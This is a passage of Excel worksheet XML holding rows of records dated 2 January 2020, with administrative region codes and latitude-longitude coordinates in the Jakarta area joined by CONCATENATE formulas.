        <v>3175010</v>
      </c>
      <c r="O127">
        <v>3175</v>
      </c>
      <c r="P127">
        <v>31</v>
      </c>
      <c r="Q127" t="s">
        <v>545</v>
      </c>
      <c r="R127" t="s">
        <v>546</v>
      </c>
      <c r="S127" t="s">
        <v>547</v>
      </c>
      <c r="T127" t="s">
        <v>33</v>
      </c>
      <c r="U127" s="5">
        <v>10677875</v>
      </c>
      <c r="V127" s="5" t="s">
        <v>14572</v>
      </c>
      <c r="W127" s="5">
        <v>-613045</v>
      </c>
      <c r="X127" t="s">
        <v>18386</v>
      </c>
      <c r="Y127" t="str">
        <f t="shared" si="1"/>
        <v>-6.13045,106.77875</v>
      </c>
    </row>
    <row r="128" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A128">
        <v>100494</v>
      </c>
      <c r="B128" s="1">
        <v>43832</v>
      </c>
      <c r="C128" s="2">
        <v>0.3127199074074074</v>
      </c>
      <c r="D128" t="s">
        <v>22</v>
      </c>
      <c r="E128" t="s">
        <v>23</v>
      </c>
      <c r="F128" t="s">
        <v>669</v>
      </c>
      <c r="H128" t="s">
        <v>26</v>
      </c>
      <c r="I128" t="s">
        <v>670</v>
      </c>
      <c r="J128" t="s">
        <v>671</v>
      </c>
      <c r="L128" t="s">
        <v>672</v>
      </c>
      <c r="M128">
        <v>3174020004</v>
      </c>
      <c r="N128">
        <v>3174020</v>
      </c>
      <c r="O128">
        <v>3174</v>
      </c>
      <c r="P128">
        <v>31</v>
      </c>
      <c r="Q128" t="s">
        <v>31</v>
      </c>
      <c r="R128" t="s">
        <v>31</v>
      </c>
      <c r="S128" t="s">
        <v>32</v>
      </c>
      <c r="T128" t="s">
        <v>33</v>
      </c>
      <c r="U128" s="5">
        <v>10676358</v>
      </c>
      <c r="V128" s="5" t="s">
        <v>14573</v>
      </c>
      <c r="W128" s="5">
        <v>-619054</v>
      </c>
      <c r="X128" t="s">
        <v>18387</v>
      </c>
      <c r="Y128" t="str">
        <f t="shared" si="1"/>
        <v>-6.19054,106.76358</v>
      </c>
    </row>
    <row r="129" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A129">
        <v>100495</v>
      </c>
      <c r="B129" s="1">
        <v>43832</v>
      </c>
      <c r="C129" s="2">
        <v>0.32627314814814817</v>
      </c>
      <c r="D129" t="s">
        <v>22</v>
      </c>
      <c r="E129" t="s">
        <v>23</v>
      </c>
      <c r="F129" t="s">
        <v>673</v>
      </c>
      <c r="G129" t="s">
        <v>674</v>
      </c>
      <c r="H129" t="s">
        <v>26</v>
      </c>
      <c r="I129" t="s">
        <v>166</v>
      </c>
      <c r="J129" t="s">
        <v>675</v>
      </c>
      <c r="L129" t="s">
        <v>676</v>
      </c>
      <c r="M129">
        <v>3174010006</v>
      </c>
      <c r="N129">
        <v>3174010</v>
      </c>
      <c r="O129">
        <v>3174</v>
      </c>
      <c r="P129">
        <v>31</v>
      </c>
      <c r="Q129" t="s">
        <v>268</v>
      </c>
      <c r="R129" t="s">
        <v>69</v>
      </c>
      <c r="S129" t="s">
        <v>32</v>
      </c>
      <c r="T129" t="s">
        <v>33</v>
      </c>
      <c r="U129" s="5">
        <v>10673404</v>
      </c>
      <c r="V129" s="5" t="s">
        <v>14574</v>
      </c>
      <c r="W129" s="5">
        <v>-618292</v>
      </c>
      <c r="X129" t="s">
        <v>18388</v>
      </c>
      <c r="Y129" t="str">
        <f t="shared" si="1"/>
        <v>-6.18292,106.73404</v>
      </c>
    </row>
    <row r="130" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A130">
        <v>100496</v>
      </c>
      <c r="B130" s="1">
        <v>43832</v>
      </c>
      <c r="C130" s="2">
        <v>0.30975694444444446</v>
      </c>
      <c r="D130" t="s">
        <v>85</v>
      </c>
      <c r="E130" t="s">
        <v>23</v>
      </c>
      <c r="F130" t="s">
        <v>677</v>
      </c>
      <c r="G130" t="s">
        <v>678</v>
      </c>
      <c r="H130" t="s">
        <v>26</v>
      </c>
      <c r="J130" t="s">
        <v>37</v>
      </c>
      <c r="K130" t="s">
        <v>679</v>
      </c>
      <c r="L130" t="s">
        <v>680</v>
      </c>
      <c r="M130">
        <v>3671030015</v>
      </c>
      <c r="N130">
        <v>3671030</v>
      </c>
      <c r="O130">
        <v>3671</v>
      </c>
      <c r="P130">
        <v>36</v>
      </c>
      <c r="Q130" t="s">
        <v>681</v>
      </c>
      <c r="R130" t="s">
        <v>201</v>
      </c>
      <c r="S130" t="s">
        <v>201</v>
      </c>
      <c r="T130" t="s">
        <v>171</v>
      </c>
      <c r="U130" s="5">
        <v>10665226</v>
      </c>
      <c r="V130" s="5" t="s">
        <v>14575</v>
      </c>
      <c r="W130" s="5">
        <v>-618548</v>
      </c>
      <c r="X130" t="s">
        <v>18389</v>
      </c>
      <c r="Y130" t="str">
        <f t="shared" si="1"/>
        <v>-6.18548,106.65226</v>
      </c>
    </row>
    <row r="131" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A131">
        <v>100502</v>
      </c>
      <c r="B131" s="1">
        <v>43832</v>
      </c>
      <c r="C131" s="2">
        <v>0.32119212962962962</v>
      </c>
      <c r="D131" t="s">
        <v>85</v>
      </c>
      <c r="E131" t="s">
        <v>23</v>
      </c>
      <c r="F131" t="s">
        <v>682</v>
      </c>
      <c r="G131" t="s">
        <v>683</v>
      </c>
      <c r="H131" t="s">
        <v>26</v>
      </c>
      <c r="J131" t="s">
        <v>37</v>
      </c>
      <c r="K131" t="s">
        <v>684</v>
      </c>
      <c r="L131" t="s">
        <v>685</v>
      </c>
      <c r="M131">
        <v>3671020014</v>
      </c>
      <c r="N131">
        <v>3671020</v>
      </c>
      <c r="O131">
        <v>3671</v>
      </c>
      <c r="P131">
        <v>36</v>
      </c>
      <c r="Q131" t="s">
        <v>686</v>
      </c>
      <c r="R131" t="s">
        <v>274</v>
      </c>
      <c r="S131" t="s">
        <v>201</v>
      </c>
      <c r="T131" t="s">
        <v>171</v>
      </c>
      <c r="U131" s="5">
        <v>10667828</v>
      </c>
      <c r="V131" s="5" t="s">
        <v>14576</v>
      </c>
      <c r="W131" s="5">
        <v>-619692</v>
      </c>
      <c r="X131" t="s">
        <v>18390</v>
      </c>
      <c r="Y131" t="str">
        <f t="shared" ref="Y131:Y194" si="2">CONCATENATE(X131,",",V131)</f>
        <v>-6.19692,106.67828</v>
      </c>
    </row>
    <row r="132" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A132">
        <v>100506</v>
      </c>
      <c r="B132" s="1">
        <v>43832</v>
      </c>
      <c r="C132" s="2">
        <v>0.30033564814814812</v>
      </c>
      <c r="D132" t="s">
        <v>85</v>
      </c>
      <c r="E132" t="s">
        <v>23</v>
      </c>
      <c r="F132" t="s">
        <v>687</v>
      </c>
      <c r="G132" t="s">
        <v>688</v>
      </c>
      <c r="H132" t="s">
        <v>26</v>
      </c>
      <c r="I132" t="s">
        <v>103</v>
      </c>
      <c r="J132" t="s">
        <v>326</v>
      </c>
      <c r="K132" t="s">
        <v>689</v>
      </c>
      <c r="L132" t="s">
        <v>690</v>
      </c>
      <c r="M132">
        <v>3173060008</v>
      </c>
      <c r="N132">
        <v>3173060</v>
      </c>
      <c r="O132">
        <v>3173</v>
      </c>
      <c r="P132">
        <v>31</v>
      </c>
      <c r="Q132" t="s">
        <v>329</v>
      </c>
      <c r="R132" t="s">
        <v>61</v>
      </c>
      <c r="S132" t="s">
        <v>62</v>
      </c>
      <c r="T132" t="s">
        <v>33</v>
      </c>
      <c r="U132" s="5">
        <v>10684045</v>
      </c>
      <c r="V132" s="5" t="s">
        <v>14577</v>
      </c>
      <c r="W132" s="5">
        <v>-616285</v>
      </c>
      <c r="X132" t="s">
        <v>18391</v>
      </c>
      <c r="Y132" t="str">
        <f t="shared" si="2"/>
        <v>-6.16285,106.84045</v>
      </c>
    </row>
    <row r="133" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A133">
        <v>100509</v>
      </c>
      <c r="B133" s="1">
        <v>43832</v>
      </c>
      <c r="C133" s="2">
        <v>0.32907407407407407</v>
      </c>
      <c r="D133" t="s">
        <v>22</v>
      </c>
      <c r="E133" t="s">
        <v>23</v>
      </c>
      <c r="F133" t="s">
        <v>691</v>
      </c>
      <c r="H133" t="s">
        <v>26</v>
      </c>
      <c r="I133" t="s">
        <v>144</v>
      </c>
      <c r="J133" t="s">
        <v>692</v>
      </c>
      <c r="L133" t="s">
        <v>693</v>
      </c>
      <c r="M133">
        <v>3174080001</v>
      </c>
      <c r="N133">
        <v>3174080</v>
      </c>
      <c r="O133">
        <v>3174</v>
      </c>
      <c r="P133">
        <v>31</v>
      </c>
      <c r="Q133" t="s">
        <v>694</v>
      </c>
      <c r="R133" t="s">
        <v>695</v>
      </c>
      <c r="S133" t="s">
        <v>32</v>
      </c>
      <c r="T133" t="s">
        <v>33</v>
      </c>
      <c r="U133" s="5">
        <v>10671628</v>
      </c>
      <c r="V133" s="5" t="s">
        <v>14578</v>
      </c>
      <c r="W133" s="5">
        <v>-616528</v>
      </c>
      <c r="X133" t="s">
        <v>18392</v>
      </c>
      <c r="Y133" t="str">
        <f t="shared" si="2"/>
        <v>-6.16528,106.71628</v>
      </c>
    </row>
    <row r="134" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A134">
        <v>100600</v>
      </c>
      <c r="B134" s="1">
        <v>43832</v>
      </c>
      <c r="C134" s="2">
        <v>0.27627314814814813</v>
      </c>
      <c r="D134" t="s">
        <v>85</v>
      </c>
      <c r="E134" t="s">
        <v>23</v>
      </c>
      <c r="F134" t="s">
        <v>696</v>
      </c>
      <c r="G134" t="s">
        <v>697</v>
      </c>
      <c r="H134" t="s">
        <v>26</v>
      </c>
      <c r="J134" t="s">
        <v>37</v>
      </c>
      <c r="K134" t="s">
        <v>698</v>
      </c>
      <c r="L134" t="s">
        <v>699</v>
      </c>
      <c r="M134">
        <v>3671011008</v>
      </c>
      <c r="N134">
        <v>3671011</v>
      </c>
      <c r="O134">
        <v>3671</v>
      </c>
      <c r="P134">
        <v>36</v>
      </c>
      <c r="Q134" t="s">
        <v>700</v>
      </c>
      <c r="R134" t="s">
        <v>701</v>
      </c>
      <c r="S134" t="s">
        <v>201</v>
      </c>
      <c r="T134" t="s">
        <v>171</v>
      </c>
      <c r="U134" s="5">
        <v>10673065</v>
      </c>
      <c r="V134" s="5" t="s">
        <v>14579</v>
      </c>
      <c r="W134" s="5">
        <v>-623262</v>
      </c>
      <c r="X134" t="s">
        <v>18393</v>
      </c>
      <c r="Y134" t="str">
        <f t="shared" si="2"/>
        <v>-6.23262,106.73065</v>
      </c>
    </row>
    <row r="135" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A135">
        <v>100636</v>
      </c>
      <c r="B135" s="1">
        <v>43832</v>
      </c>
      <c r="C135" s="2">
        <v>0.34853009259259254</v>
      </c>
      <c r="D135" t="s">
        <v>22</v>
      </c>
      <c r="E135" t="s">
        <v>23</v>
      </c>
      <c r="F135" t="s">
        <v>702</v>
      </c>
      <c r="G135" t="s">
        <v>703</v>
      </c>
      <c r="H135" t="s">
        <v>26</v>
      </c>
      <c r="I135" t="s">
        <v>704</v>
      </c>
      <c r="J135" t="s">
        <v>37</v>
      </c>
      <c r="L135" t="s">
        <v>705</v>
      </c>
      <c r="M135">
        <v>3674070007</v>
      </c>
      <c r="N135">
        <v>3674070</v>
      </c>
      <c r="O135">
        <v>3674</v>
      </c>
      <c r="P135">
        <v>36</v>
      </c>
      <c r="Q135" t="s">
        <v>706</v>
      </c>
      <c r="R135" t="s">
        <v>707</v>
      </c>
      <c r="S135" t="s">
        <v>170</v>
      </c>
      <c r="T135" t="s">
        <v>171</v>
      </c>
      <c r="U135" s="5">
        <v>10667836</v>
      </c>
      <c r="V135" s="5" t="s">
        <v>14580</v>
      </c>
      <c r="W135" s="5">
        <v>-623458</v>
      </c>
      <c r="X135" t="s">
        <v>18394</v>
      </c>
      <c r="Y135" t="str">
        <f t="shared" si="2"/>
        <v>-6.23458,106.67836</v>
      </c>
    </row>
    <row r="136" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A136">
        <v>100741</v>
      </c>
      <c r="B136" s="1">
        <v>43832</v>
      </c>
      <c r="C136" s="2">
        <v>0.33159722222222221</v>
      </c>
      <c r="D136" t="s">
        <v>85</v>
      </c>
      <c r="E136" t="s">
        <v>23</v>
      </c>
      <c r="F136" t="s">
        <v>708</v>
      </c>
      <c r="G136" t="s">
        <v>709</v>
      </c>
      <c r="H136" t="s">
        <v>26</v>
      </c>
      <c r="I136" t="s">
        <v>710</v>
      </c>
      <c r="J136" t="s">
        <v>306</v>
      </c>
      <c r="K136" t="s">
        <v>711</v>
      </c>
      <c r="L136" t="s">
        <v>712</v>
      </c>
      <c r="M136">
        <v>3172060001</v>
      </c>
      <c r="N136">
        <v>3172060</v>
      </c>
      <c r="O136">
        <v>3172</v>
      </c>
      <c r="P136">
        <v>31</v>
      </c>
      <c r="Q136" t="s">
        <v>309</v>
      </c>
      <c r="R136" t="s">
        <v>48</v>
      </c>
      <c r="S136" t="s">
        <v>49</v>
      </c>
      <c r="T136" t="s">
        <v>33</v>
      </c>
      <c r="U136" s="5">
        <v>10686717</v>
      </c>
      <c r="V136" s="5" t="s">
        <v>14581</v>
      </c>
      <c r="W136" s="5">
        <v>-623850</v>
      </c>
      <c r="X136" t="s">
        <v>18395</v>
      </c>
      <c r="Y136" t="str">
        <f t="shared" si="2"/>
        <v>-6.23850,106.86717</v>
      </c>
    </row>
    <row r="137" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A137">
        <v>100782</v>
      </c>
      <c r="B137" s="1">
        <v>43832</v>
      </c>
      <c r="C137" s="2">
        <v>0.36099537037037038</v>
      </c>
      <c r="D137" t="s">
        <v>22</v>
      </c>
      <c r="E137" t="s">
        <v>23</v>
      </c>
      <c r="F137" t="s">
        <v>713</v>
      </c>
      <c r="G137" t="s">
        <v>714</v>
      </c>
      <c r="H137" t="s">
        <v>26</v>
      </c>
      <c r="I137" t="s">
        <v>715</v>
      </c>
      <c r="J137" t="s">
        <v>667</v>
      </c>
      <c r="L137" t="s">
        <v>716</v>
      </c>
      <c r="M137">
        <v>3175010003</v>
      </c>
      <c r="N137">
        <v>3175010</v>
      </c>
      <c r="O137">
        <v>3175</v>
      </c>
      <c r="P137">
        <v>31</v>
      </c>
      <c r="Q137" t="s">
        <v>545</v>
      </c>
      <c r="R137" t="s">
        <v>546</v>
      </c>
      <c r="S137" t="s">
        <v>547</v>
      </c>
      <c r="T137" t="s">
        <v>33</v>
      </c>
      <c r="U137" s="5">
        <v>10678060</v>
      </c>
      <c r="V137" s="5" t="s">
        <v>14582</v>
      </c>
      <c r="W137" s="5">
        <v>-613149</v>
      </c>
      <c r="X137" t="s">
        <v>18396</v>
      </c>
      <c r="Y137" t="str">
        <f t="shared" si="2"/>
        <v>-6.13149,106.78060</v>
      </c>
    </row>
    <row r="138" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A138">
        <v>100848</v>
      </c>
      <c r="B138" s="1">
        <v>43832</v>
      </c>
      <c r="C138" s="2">
        <v>0.3668865740740741</v>
      </c>
      <c r="D138" t="s">
        <v>22</v>
      </c>
      <c r="E138" t="s">
        <v>23</v>
      </c>
      <c r="F138" t="s">
        <v>717</v>
      </c>
      <c r="G138" t="s">
        <v>718</v>
      </c>
      <c r="H138" t="s">
        <v>26</v>
      </c>
      <c r="I138" t="s">
        <v>290</v>
      </c>
      <c r="J138" t="s">
        <v>448</v>
      </c>
      <c r="L138" t="s">
        <v>719</v>
      </c>
      <c r="M138">
        <v>3173070001</v>
      </c>
      <c r="N138">
        <v>3173070</v>
      </c>
      <c r="O138">
        <v>3173</v>
      </c>
      <c r="P138">
        <v>31</v>
      </c>
      <c r="Q138" t="s">
        <v>322</v>
      </c>
      <c r="R138" t="s">
        <v>323</v>
      </c>
      <c r="S138" t="s">
        <v>62</v>
      </c>
      <c r="T138" t="s">
        <v>33</v>
      </c>
      <c r="U138" s="5">
        <v>10683671</v>
      </c>
      <c r="V138" s="5" t="s">
        <v>14583</v>
      </c>
      <c r="W138" s="5">
        <v>-616438</v>
      </c>
      <c r="X138" t="s">
        <v>18330</v>
      </c>
      <c r="Y138" t="str">
        <f t="shared" si="2"/>
        <v>-6.16438,106.83671</v>
      </c>
    </row>
    <row r="139" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A139">
        <v>100849</v>
      </c>
      <c r="B139" s="1">
        <v>43832</v>
      </c>
      <c r="C139" s="2">
        <v>0.36704861111111109</v>
      </c>
      <c r="D139" t="s">
        <v>22</v>
      </c>
      <c r="E139" t="s">
        <v>23</v>
      </c>
      <c r="F139" t="s">
        <v>720</v>
      </c>
      <c r="G139" t="s">
        <v>721</v>
      </c>
      <c r="H139" t="s">
        <v>26</v>
      </c>
      <c r="I139" t="s">
        <v>722</v>
      </c>
      <c r="J139" t="s">
        <v>723</v>
      </c>
      <c r="L139" t="s">
        <v>724</v>
      </c>
      <c r="M139">
        <v>3174070002</v>
      </c>
      <c r="N139">
        <v>3174070</v>
      </c>
      <c r="O139">
        <v>3174</v>
      </c>
      <c r="P139">
        <v>31</v>
      </c>
      <c r="Q139" t="s">
        <v>621</v>
      </c>
      <c r="R139" t="s">
        <v>84</v>
      </c>
      <c r="S139" t="s">
        <v>32</v>
      </c>
      <c r="T139" t="s">
        <v>33</v>
      </c>
      <c r="U139" s="5">
        <v>10674462</v>
      </c>
      <c r="V139" s="5" t="s">
        <v>14584</v>
      </c>
      <c r="W139" s="5">
        <v>-616466</v>
      </c>
      <c r="X139" t="s">
        <v>18397</v>
      </c>
      <c r="Y139" t="str">
        <f t="shared" si="2"/>
        <v>-6.16466,106.74462</v>
      </c>
    </row>
    <row r="140" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A140">
        <v>100872</v>
      </c>
      <c r="B140" s="1">
        <v>43832</v>
      </c>
      <c r="C140" s="2">
        <v>0.37153935185185188</v>
      </c>
      <c r="D140" t="s">
        <v>22</v>
      </c>
      <c r="E140" t="s">
        <v>23</v>
      </c>
      <c r="F140" t="s">
        <v>725</v>
      </c>
      <c r="G140" t="s">
        <v>726</v>
      </c>
      <c r="H140" t="s">
        <v>26</v>
      </c>
      <c r="I140" t="s">
        <v>727</v>
      </c>
      <c r="J140" t="s">
        <v>728</v>
      </c>
      <c r="L140" t="s">
        <v>729</v>
      </c>
      <c r="M140">
        <v>3174040001</v>
      </c>
      <c r="N140">
        <v>3174040</v>
      </c>
      <c r="O140">
        <v>3174</v>
      </c>
      <c r="P140">
        <v>31</v>
      </c>
      <c r="Q140" t="s">
        <v>730</v>
      </c>
      <c r="R140" t="s">
        <v>377</v>
      </c>
      <c r="S140" t="s">
        <v>32</v>
      </c>
      <c r="T140" t="s">
        <v>33</v>
      </c>
      <c r="U140" s="5">
        <v>10678065</v>
      </c>
      <c r="V140" s="5" t="s">
        <v>14585</v>
      </c>
      <c r="W140" s="5">
        <v>-616973</v>
      </c>
      <c r="X140" t="s">
        <v>18398</v>
      </c>
      <c r="Y140" t="str">
        <f t="shared" si="2"/>
        <v>-6.16973,106.78065</v>
      </c>
    </row>
    <row r="141" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A141">
        <v>100881</v>
      </c>
      <c r="B141" s="1">
        <v>43832</v>
      </c>
      <c r="C141" s="2">
        <v>0.37146990740740743</v>
      </c>
      <c r="D141" t="s">
        <v>22</v>
      </c>
      <c r="E141" t="s">
        <v>23</v>
      </c>
      <c r="F141" t="s">
        <v>731</v>
      </c>
      <c r="H141" t="s">
        <v>26</v>
      </c>
      <c r="I141" t="s">
        <v>732</v>
      </c>
      <c r="J141" t="s">
        <v>581</v>
      </c>
      <c r="L141" t="s">
        <v>733</v>
      </c>
      <c r="M141">
        <v>3174020007</v>
      </c>
      <c r="N141">
        <v>3174020</v>
      </c>
      <c r="O141">
        <v>3174</v>
      </c>
      <c r="P141">
        <v>31</v>
      </c>
      <c r="Q141" t="s">
        <v>95</v>
      </c>
      <c r="R141" t="s">
        <v>31</v>
      </c>
      <c r="S141" t="s">
        <v>32</v>
      </c>
      <c r="T141" t="s">
        <v>33</v>
      </c>
      <c r="U141" s="5">
        <v>10676700</v>
      </c>
      <c r="V141" s="5" t="s">
        <v>14586</v>
      </c>
      <c r="W141" s="5">
        <v>-616817</v>
      </c>
      <c r="X141" t="s">
        <v>18399</v>
      </c>
      <c r="Y141" t="str">
        <f t="shared" si="2"/>
        <v>-6.16817,106.76700</v>
      </c>
    </row>
    <row r="142" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A142">
        <v>100884</v>
      </c>
      <c r="B142" s="1">
        <v>43832</v>
      </c>
      <c r="C142" s="2">
        <v>0.37322916666666667</v>
      </c>
      <c r="D142" t="s">
        <v>22</v>
      </c>
      <c r="E142" t="s">
        <v>23</v>
      </c>
      <c r="F142" t="s">
        <v>734</v>
      </c>
      <c r="G142" t="s">
        <v>735</v>
      </c>
      <c r="H142" t="s">
        <v>26</v>
      </c>
      <c r="I142" t="s">
        <v>736</v>
      </c>
      <c r="J142" t="s">
        <v>37</v>
      </c>
      <c r="M142">
        <v>3671031016</v>
      </c>
      <c r="N142">
        <v>3671031</v>
      </c>
      <c r="O142">
        <v>3671</v>
      </c>
      <c r="P142">
        <v>36</v>
      </c>
      <c r="Q142" t="s">
        <v>737</v>
      </c>
      <c r="R142" t="s">
        <v>738</v>
      </c>
      <c r="S142" t="s">
        <v>201</v>
      </c>
      <c r="T142" t="s">
        <v>171</v>
      </c>
      <c r="U142" s="5">
        <v>10661001</v>
      </c>
      <c r="V142" s="5" t="s">
        <v>14587</v>
      </c>
      <c r="W142" s="5">
        <v>-616584</v>
      </c>
      <c r="X142" t="s">
        <v>18400</v>
      </c>
      <c r="Y142" t="str">
        <f t="shared" si="2"/>
        <v>-6.16584,106.61001</v>
      </c>
    </row>
    <row r="143" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A143">
        <v>100885</v>
      </c>
      <c r="B143" s="1">
        <v>43832</v>
      </c>
      <c r="C143" s="2">
        <v>0.37320601851851848</v>
      </c>
      <c r="D143" t="s">
        <v>22</v>
      </c>
      <c r="E143" t="s">
        <v>23</v>
      </c>
      <c r="F143" t="s">
        <v>739</v>
      </c>
      <c r="G143" t="s">
        <v>740</v>
      </c>
      <c r="H143" t="s">
        <v>26</v>
      </c>
      <c r="I143" t="s">
        <v>741</v>
      </c>
      <c r="J143" t="s">
        <v>629</v>
      </c>
      <c r="L143" t="s">
        <v>742</v>
      </c>
      <c r="M143">
        <v>3174040007</v>
      </c>
      <c r="N143">
        <v>3174040</v>
      </c>
      <c r="O143">
        <v>3174</v>
      </c>
      <c r="P143">
        <v>31</v>
      </c>
      <c r="Q143" t="s">
        <v>389</v>
      </c>
      <c r="R143" t="s">
        <v>377</v>
      </c>
      <c r="S143" t="s">
        <v>32</v>
      </c>
      <c r="T143" t="s">
        <v>33</v>
      </c>
      <c r="U143" s="5">
        <v>10678327</v>
      </c>
      <c r="V143" s="5" t="s">
        <v>14588</v>
      </c>
      <c r="W143" s="5">
        <v>-614460</v>
      </c>
      <c r="X143" t="s">
        <v>18401</v>
      </c>
      <c r="Y143" t="str">
        <f t="shared" si="2"/>
        <v>-6.14460,106.78327</v>
      </c>
    </row>
    <row r="144" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A144">
        <v>100924</v>
      </c>
      <c r="B144" s="1">
        <v>43832</v>
      </c>
      <c r="C144" s="2">
        <v>0.38505787037037037</v>
      </c>
      <c r="D144" t="s">
        <v>22</v>
      </c>
      <c r="E144" t="s">
        <v>23</v>
      </c>
      <c r="F144" t="s">
        <v>743</v>
      </c>
      <c r="G144" t="s">
        <v>744</v>
      </c>
      <c r="H144" t="s">
        <v>26</v>
      </c>
      <c r="I144" t="s">
        <v>745</v>
      </c>
      <c r="J144" t="s">
        <v>586</v>
      </c>
      <c r="L144" t="s">
        <v>746</v>
      </c>
      <c r="M144">
        <v>3173050002</v>
      </c>
      <c r="N144">
        <v>3173050</v>
      </c>
      <c r="O144">
        <v>3173</v>
      </c>
      <c r="P144">
        <v>31</v>
      </c>
      <c r="Q144" t="s">
        <v>588</v>
      </c>
      <c r="R144" t="s">
        <v>589</v>
      </c>
      <c r="S144" t="s">
        <v>62</v>
      </c>
      <c r="T144" t="s">
        <v>33</v>
      </c>
      <c r="U144" s="5">
        <v>10686539</v>
      </c>
      <c r="V144" s="5" t="s">
        <v>14555</v>
      </c>
      <c r="W144" s="5">
        <v>-617469</v>
      </c>
      <c r="X144" t="s">
        <v>18368</v>
      </c>
      <c r="Y144" t="str">
        <f t="shared" si="2"/>
        <v>-6.17469,106.86539</v>
      </c>
    </row>
    <row r="145" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A145">
        <v>100926</v>
      </c>
      <c r="B145" s="1">
        <v>43832</v>
      </c>
      <c r="C145" s="2">
        <v>0.38642361111111106</v>
      </c>
      <c r="D145" t="s">
        <v>22</v>
      </c>
      <c r="E145" t="s">
        <v>23</v>
      </c>
      <c r="F145" t="s">
        <v>747</v>
      </c>
      <c r="G145" t="s">
        <v>748</v>
      </c>
      <c r="H145" t="s">
        <v>26</v>
      </c>
      <c r="I145" t="s">
        <v>197</v>
      </c>
      <c r="J145" t="s">
        <v>749</v>
      </c>
      <c r="L145" t="s">
        <v>750</v>
      </c>
      <c r="M145">
        <v>3174040005</v>
      </c>
      <c r="N145">
        <v>3174040</v>
      </c>
      <c r="O145">
        <v>3174</v>
      </c>
      <c r="P145">
        <v>31</v>
      </c>
      <c r="Q145" t="s">
        <v>376</v>
      </c>
      <c r="R145" t="s">
        <v>377</v>
      </c>
      <c r="S145" t="s">
        <v>32</v>
      </c>
      <c r="T145" t="s">
        <v>33</v>
      </c>
      <c r="U145" s="5">
        <v>10679090</v>
      </c>
      <c r="V145" s="5" t="s">
        <v>14589</v>
      </c>
      <c r="W145" s="5">
        <v>-615520</v>
      </c>
      <c r="X145" t="s">
        <v>18402</v>
      </c>
      <c r="Y145" t="str">
        <f t="shared" si="2"/>
        <v>-6.15520,106.79090</v>
      </c>
    </row>
    <row r="146" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A146">
        <v>100927</v>
      </c>
      <c r="B146" s="1">
        <v>43832</v>
      </c>
      <c r="C146" s="2">
        <v>0.38614583333333335</v>
      </c>
      <c r="D146" t="s">
        <v>22</v>
      </c>
      <c r="E146" t="s">
        <v>23</v>
      </c>
      <c r="F146" t="s">
        <v>751</v>
      </c>
      <c r="G146" t="s">
        <v>752</v>
      </c>
      <c r="H146" t="s">
        <v>26</v>
      </c>
      <c r="I146" t="s">
        <v>753</v>
      </c>
      <c r="J146" t="s">
        <v>28</v>
      </c>
      <c r="L146" t="s">
        <v>754</v>
      </c>
      <c r="M146">
        <v>3174020005</v>
      </c>
      <c r="N146">
        <v>3174020</v>
      </c>
      <c r="O146">
        <v>3174</v>
      </c>
      <c r="P146">
        <v>31</v>
      </c>
      <c r="Q146" t="s">
        <v>30</v>
      </c>
      <c r="R146" t="s">
        <v>31</v>
      </c>
      <c r="S146" t="s">
        <v>32</v>
      </c>
      <c r="T146" t="s">
        <v>33</v>
      </c>
      <c r="U146" s="5">
        <v>10676829</v>
      </c>
      <c r="V146" s="5" t="s">
        <v>14590</v>
      </c>
      <c r="W146" s="5">
        <v>-616893</v>
      </c>
      <c r="X146" t="s">
        <v>18403</v>
      </c>
      <c r="Y146" t="str">
        <f t="shared" si="2"/>
        <v>-6.16893,106.76829</v>
      </c>
    </row>
    <row r="147" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A147">
        <v>100929</v>
      </c>
      <c r="B147" s="1">
        <v>43832</v>
      </c>
      <c r="C147" s="2">
        <v>0.36981481481481482</v>
      </c>
      <c r="D147" t="s">
        <v>85</v>
      </c>
      <c r="E147" t="s">
        <v>23</v>
      </c>
      <c r="F147" t="s">
        <v>755</v>
      </c>
      <c r="G147" t="s">
        <v>756</v>
      </c>
      <c r="H147" t="s">
        <v>26</v>
      </c>
      <c r="I147" t="s">
        <v>103</v>
      </c>
      <c r="J147" t="s">
        <v>37</v>
      </c>
      <c r="K147" t="s">
        <v>757</v>
      </c>
      <c r="L147" t="s">
        <v>758</v>
      </c>
      <c r="M147">
        <v>3671012001</v>
      </c>
      <c r="N147">
        <v>3671012</v>
      </c>
      <c r="O147">
        <v>3671</v>
      </c>
      <c r="P147">
        <v>36</v>
      </c>
      <c r="Q147" t="s">
        <v>759</v>
      </c>
      <c r="R147" t="s">
        <v>760</v>
      </c>
      <c r="S147" t="s">
        <v>201</v>
      </c>
      <c r="T147" t="s">
        <v>171</v>
      </c>
      <c r="U147" s="5">
        <v>10669638</v>
      </c>
      <c r="V147" s="5" t="s">
        <v>14591</v>
      </c>
      <c r="W147" s="5">
        <v>-622224</v>
      </c>
      <c r="X147" t="s">
        <v>18404</v>
      </c>
      <c r="Y147" t="str">
        <f t="shared" si="2"/>
        <v>-6.22224,106.69638</v>
      </c>
    </row>
    <row r="148" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A148">
        <v>100930</v>
      </c>
      <c r="B148" s="1">
        <v>43832</v>
      </c>
      <c r="C148" s="2">
        <v>0.37694444444444447</v>
      </c>
      <c r="D148" t="s">
        <v>85</v>
      </c>
      <c r="E148" t="s">
        <v>23</v>
      </c>
      <c r="F148" t="s">
        <v>761</v>
      </c>
      <c r="G148" t="s">
        <v>762</v>
      </c>
      <c r="H148" t="s">
        <v>26</v>
      </c>
      <c r="J148" t="s">
        <v>37</v>
      </c>
      <c r="K148" t="s">
        <v>763</v>
      </c>
      <c r="L148" t="s">
        <v>764</v>
      </c>
      <c r="M148">
        <v>3671012001</v>
      </c>
      <c r="N148">
